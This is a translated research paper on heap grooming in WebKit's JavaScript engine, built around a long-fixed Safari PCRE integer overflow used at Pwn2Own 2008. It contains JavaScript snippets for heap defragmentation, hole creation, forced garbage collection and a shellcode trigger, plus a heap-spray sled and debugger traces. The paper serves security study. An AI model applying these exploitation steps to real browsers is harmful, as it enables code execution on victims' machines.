Exploiting Heap Overflows with JavaScript

From the translator

In this study, the authors present an interesting technique for exploiting heap overflows. The vulnerability itself was fixed long ago, but the technique is still interesting, and the exploitation process is described in some detail.
If you are interested in information security and want to understand how the overflows that keep appearing in the news actually work, you will enjoy this study.

Foreword

This article presents a new method of exploiting heap overflows in JavaScript interpreters. In short, given a heap overflow, JavaScript commands can be used to ensure that a function pointer is located immediately after the buffer being overflowed. A case study illustrates the technique using a vulnerability in Safari, which the authors used to win the CanSecWest 2008 Pwn2Own competition.

Introduction

Many buffer overflow and integer overflow vulnerabilities allow a more or less arbitrary set of values to be written at a relative offset from a pointer into the heap. Unfortunately for an attacker, the data following that pointer is often unpredictable, which makes exploitation difficult and unreliable. Even an ideal heap overflow, in which the attacker fully controls the number and values of the overflowed bytes, can be almost impossible to exploit if nothing interesting and predictable is waiting to be overwritten.

Because of safe unlinking protections, heap metadata structures are increasingly no longer a viable target for overflows. Currently, the overflow target usually has to be application data for which normal program execution results in a call through a function pointer that has been overwritten with a pointer to the attacker's code. However, such exploits are in no way guaranteed to be reliable. For the overflow to succeed, pointers that have not yet been used must sit on the heap after the overflowed buffer, and there must be no other critical data or unmapped memory between them, since corrupting either would lead to a premature crash. Such ideal conditions are, of course, rare for any given application.
However, given access to a client-side scripting language such as JavaScript, an attacker can create these ideal conditions for vulnerabilities in applications such as web browsers. In (Sotirov, A. Heap Feng Shui in JavaScript. Blackhat Europe 2007), Sotirov describes how to use JavaScript allocations in Internet Explorer to give an attacker control over the target heap. In this article, we describe a new technique, inspired by his Heap Feng Shui, which can be used to reliably position function pointers so that a heap overflow can later overwrite them.

2 Technique

2.1 Context

In a broad sense, this method can be used to develop client-side exploits against web browsers that use JavaScript. In this context, the attacker creates a web page containing (among other things) JavaScript commands and lures the victim into loading the page in the browser. Using certain JavaScript commands, the attacker manipulates the state of the heap in the victim's browser process in order to set up a successful attack.

In what follows, we refer to the buffer that is overflowed as the vulnerable buffer. For this technique to apply, it must be possible to trigger both the allocation and the overflow of the vulnerable buffer from within the JavaScript interpreter. In particular, the method does not apply in situations where the vulnerable buffer has already been allocated before the JavaScript interpreter has been created.

We also assume that shellcode is available and that a mechanism for loading it into memory has already been found. This is trivial with JavaScript: just load it into a large string.

2.2 Overview

Recall that the goal is to control the heap buffer immediately after the vulnerable buffer. We achieve this by arranging for the heap to contain many holes that are large enough to hold the vulnerable buffer and are surrounded by buffers that we control.

The technique consists of five stages.

1. Defragmenting the heap.
2. Making holes in the heap.
3. Preparing the blocks around the holes.
4. Triggering the allocation and the overflow.
5. Triggering the jump to shellcode.

These steps are described in more detail in the rest of this section.

2.3 Defragmentation

The state of a process heap depends on the history of memory allocations and deallocations that occurred during the life of the process. Therefore, the state of the heap of a long-running multi-threaded process (for example, a web browser) is unpredictable. As a rule, such a heap is fragmented: it contains many holes of free memory. The presence of free holes of different sizes means that the addresses of successive allocations of same-sized buffers are unlikely to bear any reliable relationship to each other. Figure 1 shows what allocation in a fragmented heap might look like:

Figure 1. Fragmented heap.

Since it is impossible to predict where these holes may occur in a heap that has been in use for some time, it is impossible to predict where the next allocation will land.

However, if we have some control over the target application, we can force the application to make many allocations of any given size. In particular, we can make enough allocations to fill essentially all the holes. Once the holes are filled, that is, once the heap is defragmented, allocations of the same size will, as a rule, land predictably next to each other, as in Figure 2:

Figure 2. Defragmented heap. Future allocations are contiguous.
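
The effect can be illustrated with a toy model. The sketch below is not WebKit's allocator: it assumes a simple first-fit policy, and the hole addresses and sizes are made up for illustration. It shows how the first few same-sized allocations land in scattered holes, while later ones extend the top of the heap and become contiguous.

```javascript
// Toy first-fit heap model (illustration only, not WebKit's allocator).
function makeHeap(holes, top) {
  return { holes: holes.map(h => ({ ...h })), top };
}

// Allocate `size` bytes: reuse the first hole that is big enough,
// otherwise extend the heap at its top.
function allocate(heap, size) {
  for (const hole of heap.holes) {
    if (hole.size >= size) {
      const addr = hole.addr;
      hole.addr += size;
      hole.size -= size;
      return addr;
    }
  }
  const addr = heap.top;
  heap.top += size;
  return addr;
}

// A hypothetical fragmented heap: three scattered holes below the top.
const heap = makeHeap(
  [
    { addr: 0x1000, size: 0x1000 },
    { addr: 0x4000, size: 0x2000 },
    { addr: 0x7000, size: 0x1000 },
  ],
  0x9000
);

const addrs = [];
for (let i = 0; i < 8; i++) addrs.push(allocate(heap, 0x1000));
console.log(addrs.map(a => "0x" + a.toString(16)).join(" "));
```

In this model the first four addresses jump around as the holes are consumed, and every allocation after that is exactly one buffer size above the previous one.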

We emphasize that defragmentation is always relative to a specific buffer size. In preparation for exploiting a vulnerability, we must defragment the heap with respect to the size of the vulnerable buffer. This size varies from vulnerability to vulnerability, but it must be known. Arranging for the defragmentation is very simple in JavaScript.

For example:

 var bigdummy = new Array(1000);
 for (i=0; i<1000; i++) {
   bigdummy[i] = new Array(size);
 }

In the above code snippet, each call to new Array(size) results in an allocation of 4 * size + 8 bytes on the heap. This allocation corresponds to an ArrayStorage object consisting of an eight-byte header followed by an array of size pointers. Initially, the entire allocation is zeroed. The value of size should be chosen so that the resulting allocations are as close as possible to, and no smaller than, the size of the vulnerable buffer. The value 1000 used above was determined empirically.
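
As a small worked example of this arithmetic, the sketch below computes the smallest array length whose allocation is at least as large as a given buffer. It assumes the 32-bit layout described above (8-byte header, 4-byte pointers); the function names and the 4000-byte target are illustrative, not taken from WebKit.

```javascript
// Assumes the 32-bit layout described in the text:
// an 8-byte header followed by one 4-byte pointer per slot.
const HEADER_BYTES = 8;
const POINTER_BYTES = 4;

// Bytes allocated on the heap for new Array(size).
function arrayStorageBytes(size) {
  return POINTER_BYTES * size + HEADER_BYTES;
}

// Smallest `size` whose allocation is no smaller than `targetBytes`.
function sizeForTarget(targetBytes) {
  return Math.max(0, Math.ceil((targetBytes - HEADER_BYTES) / POINTER_BYTES));
}

// Hypothetical target: a vulnerable buffer of 4000 bytes.
const size = sizeForTarget(4000);
console.log(size, arrayStorageBytes(size));
```

For a 4000-byte target this gives size = 998, since 4 * 998 + 8 = 4000.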

2.4 Making holes

Recall that our goal is to gain control over the buffer that follows the vulnerable buffer. Assuming that the defragmentation worked, we should have a number of contiguous buffers at the end of the heap, each about the same size as the (not yet allocated) vulnerable buffer (Figure 3):

Figure 3. Defragmented heap with many allocations. We see a long run of same-sized buffers that we control.

The next step is to free every other one of these contiguous buffers, leaving alternating buffers and holes that match the size of the vulnerable buffer.

The first step in achieving this is the following code:

 for (i=900; i<1000; i+=2){ delete(bigdummy[i]); }

The lower limit in the for loop is based on the assumption that after 900 allocations at the defragmentation stage, we have reached a point where all subsequent allocations occur contiguously at the end of the heap.
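
The intended result of this step can be sketched with a toy model. It assumes that freed memory becomes available immediately and that the allocator hands out the first matching hole; both are simplifications, and the base address and buffer size are hypothetical.

```javascript
// Toy model: a run of equal-sized buffers at the end of a defragmented heap.
const BUF = 0x1000;
const base = 0x17160000;   // hypothetical start address of the run
const owner = new Map();   // address -> "controlled" | "vulnerable"
for (let i = 0; i < 10; i++) owner.set(base + i * BUF, "controlled");

// Free every other buffer, leaving alternating buffers and holes.
const holes = [];
for (let i = 0; i < 10; i += 2) {
  owner.delete(base + i * BUF);
  holes.push(base + i * BUF);
}

// Assumed first-fit policy: the next same-sized allocation takes the first hole.
function allocateVulnerable() {
  const addr = holes.shift();
  owner.set(addr, "vulnerable");
  return addr;
}

const vuln = allocateVulnerable();
const neighbour = owner.get(vuln + BUF);
console.log("0x" + vuln.toString(16), neighbour);
```

Whichever hole the real allocator picks, the buffer immediately after it is one that the script still holds, which is the property the technique relies on.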

Unfortunately, at this stage we have a problem. Simply deleting an object in JavaScript does not immediately cause the object's space in the heap to be freed. The space is not released until garbage collection takes place. Internet Explorer provides the CollectGarbage() method, which starts garbage collection immediately, but other browser implementations do not. In particular, WebKit does not. We therefore digress to discuss garbage collection in WebKit.

Our inspection of the WebKit source code showed that there are three main events that can trigger garbage collection. To understand these events, you need to be familiar with how the JavaScript implementation in WebKit manages objects.

The implementation maintains two structures: primaryHeap and numberHeap, each of which is an array of pointers to CollectorBlock objects. A CollectorBlock is an array of fixed-size cells, and each cell can contain a JSCell object (or a derivative). Each JavaScript object occupies a cell in one of these heaps. Large objects (such as arrays and strings) occupy additional memory in the system heap. We refer to this additional system memory as associated storage.

Each CollectorBlock maintains a linked list of free cells. When an allocation is requested and there are no free cells in any existing CollectorBlock, a new CollectorBlock is allocated.

All JavaScript objects derived from JSObject are allocated in the primaryHeap. numberHeap is reserved for NumberImp objects. Note that the latter do not correspond to JavaScript Number objects but are, as a rule, short-lived objects corresponding to intermediate arithmetic calculations.

When garbage collection starts, both heaps are checked for objects with zero references, and such objects (and their associated storage, if any) are released.

We now return to the three events that trigger garbage collection:

1. Expiration of a dedicated garbage collection timer.
2. An allocation request that occurs when all of a given heap's CollectorBlocks are full.
3. Allocation of an object with sufficiently large associated storage (or of several such objects).

The first of these events is not very useful, because JavaScript has no sleep routine, and any noticeable delay in the script may bring up the “Slow Script” dialog box.

The last of these events depends on the number of objects in the primaryHeap and the size of their associated storage. Experiments show that the state of primaryHeap varies greatly depending on the number of open web pages in the browser and the extent to which these pages use JavaScript. Therefore, reliably starting garbage collection with this event is difficult.

On the other hand, numberHeap appears to be relatively insensitive to these variations. Our experiments show that numberHeap maintains only a single allocated CollectorBlock, even after significant browsing of JavaScript-heavy pages. Because a numberHeap CollectorBlock has 4062 cells, JavaScript code that creates many NumberImps (that is, performs many arithmetic operations with intermediate results) should trigger garbage collection. For example, manipulating double-precision numbers (doubles) is an operation that allocates a NumberImp from numberHeap, so the following JavaScript code can be used to start garbage collection:

 for (i=0; i<4100; i++) { a = .5; }

After completing this code, the heap should look like Figure 4, and we are ready for the next step:

Figure 4. Controlled heap with every other buffer freed. The allocation of the vulnerable buffer will land in one of the holes.
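
The garbage collection trigger used in this section can be modelled roughly as follows. This is a deliberately simplified sketch, not WebKit code: the class and its methods are hypothetical, and only the figure of 4062 cells per block comes from the text. It shows that 4100 short-lived allocations against a single full block force at least one collection.

```javascript
// Simplified model of one collector heap (illustration only).
class ToyCollectorHeap {
  constructor(cellsPerBlock) {
    this.cellsPerBlock = cellsPerBlock;
    this.blocks = 1;        // number of CollectorBlocks
    this.cells = [];        // one flag per occupied cell: still referenced?
    this.collections = 0;   // how many times a collection has run
  }

  capacity() {
    return this.blocks * this.cellsPerBlock;
  }

  // Release every cell that is no longer referenced.
  collect() {
    this.collections++;
    this.cells = this.cells.filter(referenced => referenced);
  }

  // Allocate one cell; `referenced` says whether it stays reachable.
  allocate(referenced) {
    if (this.cells.length === this.capacity()) {
      this.collect();                                  // all blocks are full
      if (this.cells.length === this.capacity()) {
        this.blocks++;                                 // still full: grow
      }
    }
    this.cells.push(referenced);
  }
}

const numberHeap = new ToyCollectorHeap(4062);
for (let i = 0; i < 4100; i++) numberHeap.allocate(false); // temporaries
console.log(numberHeap.collections, numberHeap.blocks);
```

In this model the collection runs when the 4063rd temporary is requested, and the heap never needs a second block.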

2.5 Preparing the blocks

This step is simple. We use the following JavaScript:

 for (i=901; i<1000; i+=2) { bigdummy[i][0] = new Number(i); }

The code bigdummy[i][0] = new Number(i) creates a new NumberInstance object and stores a pointer to this object in the ArrayStorage object corresponding to bigdummy[i]. Figure 5 shows a portion of the heap after this JavaScript has run:

Figure 5. Details of an attacker-controlled block immediately before the overflow is triggered.

2.6 Triggering allocation and overflow

Now it is time to allocate the vulnerable buffer. If the previous steps went as expected, the allocation for the vulnerable buffer will land in one of the holes we created, and we are ready to overflow. The goal of the overflow is to overwrite the pNI pointer in the ArrayStorage object that follows the vulnerable buffer. The new value must be an address in the sled for the shellcode. Details of the sled are discussed below, but for now, note that a typical NOP sled (https://en.wikipedia.org/wiki/NOP_slide) is not appropriate here. After allocation and overflow, the heap should look like Figure 6:

Figure 6. Details of the attacker-controlled block immediately after the overflow is triggered.

2.7 Starting the transition to shellcode

The jump to the shellcode is triggered simply by interacting with the Number objects created while preparing the blocks above. More specifically, we need to force a call to a virtual method of the underlying NumberInstance object in the JavaScript implementation. For blocks that have not been overwritten, execution is transferred to *((*pNI) + 4*k), where k is the index in the virtual function table of the method being called. For the block that immediately follows the vulnerable buffer, execution is transferred to *((*pSled) + 4*k). This double dereference of pSled is a bit annoying, but the practical example in Section 3 shows a simple way to deal with it.
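
To make the double dereference concrete, here is a toy model of a 32-bit memory as a map from addresses to dwords. All addresses and values are hypothetical. The second half shows why a region in which every dword holds an address inside that same region survives both dereferences for any small k.

```javascript
// Toy 32-bit memory: address -> dword (illustration only).
const mem = new Map();

function read(addr) {
  if (!mem.has(addr)) {
    throw new Error("unmapped address 0x" + addr.toString(16));
  }
  return mem.get(addr);
}

// Target of virtual call number k on the object pointed to by p:
// *((*p) + 4 * k)
function virtualCallTarget(p, k) {
  const vtable = read(p);       // first dereference: object -> vtable
  return read(vtable + 4 * k);  // second dereference: vtable slot -> code
}

// Ordinary object at 0x1000 whose vtable at 0x2000 holds two method addresses.
mem.set(0x1000, 0x2000);
mem.set(0x2000, 0xa000);
mem.set(0x2004, 0xb000);
const normalTarget = virtualCallTarget(0x1000, 1);

// Self-referential region: every dword holds the region's own base address.
const REGION = 0x5000;
for (let a = REGION; a < REGION + 0x40; a += 4) mem.set(a, REGION);
const regionTarget = virtualCallTarget(REGION, 3);

console.log(normalTarget.toString(16), regionTarget.toString(16));
```

In the second case both reads return an address inside the region, so the call lands there regardless of which method index is used.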

The following JavaScript calls the virtual function for each NumberInstance object and thereby starts execution of shellcode.

 for (i=901; i<1000; i+=2) { document.write(bigdummy[i][0] + "<br />"); }

3 A practical example

Our research into reliable exploitation with JavaScript was motivated by a vulnerability that we found in WebKit's Perl-Compatible Regular Expression (PCRE) parsing. It was an integer overflow that allowed an overflow of arbitrary size past the end of the buffer holding the compiled regular expression, a buffer that can itself be of any size up to 65535 bytes. However, the overflow occurred very soon after the buffer was allocated, so we often ran into unmapped memory during the overflow. In other cases, we overwrote important data, but which data was affected seemed completely unpredictable from run to run. The technique described in Section 2 solved these problems for us and allowed us to make exploitation reliable.

First, we had to defragment the heap for a target size of about 4,000 bytes. The following debugger output shows the first few allocations being used to defragment the heap (note how the allocation addresses jump around):

Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$1 = 0x16278c78
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$2 = 0x50d000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$3 = 0x510000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$4 = 0x16155000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$5 = 0x1647b000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$6 = 0x1650f000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$7 = 0x5ac000

By the time we have completed nearly 1000 allocations, the heap starts to look quite predictable, and all allocations end up contiguous.

Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$997 = 0x17164000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$998 = 0x17165000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$999 = 0x17166000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$1000 = 0x17167000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$1001 = 0x17168000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance ()
array buffer at$1002 = 0x17169000

After creating a series of holes at the end of the heap, using the garbage collection technique described in Section 2.4, we see that the vulnerable buffer lands in the last hole at 0x17168000, just before the data that we control at 0x17169000.

Breakpoint 2, 0x95846748 in jsRegExpCompile ()
regex buffer at$1004 = 0x17168000

Therefore, we will overflow our regular expression buffer into the ArrayStorage data. The overflow bytes must be bytes of a compiled regular expression. Fortunately, the regular expression character class construct allows virtually arbitrary bytes in compiled form: it compiles to 33 bytes, the last 32 of which form a 256-bit bitmap in which a bit set to one means that the corresponding character is in the class. Thus, we use the character class [\x00\x59\x5c\x5e] and arrange for its bitmap to land at the beginning of the ArrayStorage data, since the first three dwords of its compiled bitmap are a non-zero dword, a zero dword, and an address in our heap, namely:

0x00000001 0x00000000 0x52000000
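
These three values can be checked with a short calculation. The sketch below assumes that bit c of the bitmap (least significant bit first within each byte) marks character code c and that dwords are read little-endian; the helper names are illustrative.

```javascript
// Build the 32-byte (256-bit) bitmap for a set of byte values:
// bit c is set when character code c is in the class.
function classBitmap(chars) {
  const bits = new Uint8Array(32);
  for (const c of chars) bits[c >> 3] |= 1 << (c & 7);
  return bits;
}

// Read a byte array as little-endian 32-bit words.
function dwords(bytes) {
  const view = new DataView(bytes.buffer);
  const out = [];
  for (let i = 0; i < bytes.length; i += 4) out.push(view.getUint32(i, true));
  return out;
}

const words = dwords(classBitmap([0x00, 0x59, 0x5c, 0x5e]));
const firstThree = words
  .slice(0, 3)
  .map(w => "0x" + w.toString(16).padStart(8, "0"))
  .join(" ");
console.log(firstThree);
```

Character 0x00 sets bit 0 of the first dword, while 0x59, 0x5c and 0x5e set bits 25, 28 and 30 of the third dword, which gives 0x02000000 + 0x10000000 + 0x40000000 = 0x52000000.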

Finally, we make that heap address valid by spraying the heap with a large string consisting of the dword 0x52780278 repeated, followed by the shellcode. We arrange the spray allocations so that the addresses we need fall inside the sprayed region. Then, when the dword is interpreted as instructions once execution begins, it decodes as two conditional jumps:

 78 02: js +0x2
 78 52: js +0x52

which act as effective NOPs regardless of the value of the jump condition: if the condition is true, a jump of two bytes is taken to the start of the next dword, and if the condition is false, the jump of 0x52 is not taken either. This means that the most significant byte, which determines the heap spray address, is never actually acted on in the sled, and the sled is also 4-byte aligned.
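
The claim that the dword behaves as a NOP for either value of the condition can be checked with a tiny simulation. The sketch below models only the x86 short-jump instruction js rel8 (opcode 0x78), whose target is the address of the next instruction plus the 8-bit offset; the function names are illustrative.

```javascript
// Little-endian byte layout of a 32-bit value.
function dwordBytes(dword) {
  return [
    dword & 0xff,
    (dword >>> 8) & 0xff,
    (dword >>> 16) & 0xff,
    (dword >>> 24) & 0xff,
  ];
}

// Execute one `js rel8` (opcode 0x78) at `offset`, given the sign flag.
function stepJs(bytes, offset, signFlag) {
  if (bytes[offset] !== 0x78) throw new Error("not a js rel8 instruction");
  const rel = bytes[offset + 1];   // both offsets used here are below 0x80
  const next = offset + 2;         // address of the following instruction
  return signFlag ? next + rel : next;
}

// Two consecutive copies of the repeated dword.
const sled = [...dwordBytes(0x52780278), ...dwordBytes(0x52780278)];

// Run from offset 0 until execution has left the first dword.
function runFirstDword(signFlag) {
  let pc = 0;
  while (pc < 4) pc = stepJs(sled, pc, signFlag);
  return pc;
}

console.log(runFirstDword(true), runFirstDword(false));
```

With the flag set, the first jump skips straight to offset 4; with the flag clear, execution falls through both instructions and also arrives at offset 4, the start of the next dword.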

4 Conclusions

The technique described in this article allowed us to reliably exploit a buffer overflow that initially had no predictable and interesting data to overwrite. As long as the attacker has some control over parameters such as allocation size, overflow size, and overflow data, this method should be applicable to other browser vulnerabilities where the attacker has access to JavaScript. We suspect that similar methods may be applicable to other client-side scripting languages.

Source: https://habr.com/ru/post/342458/
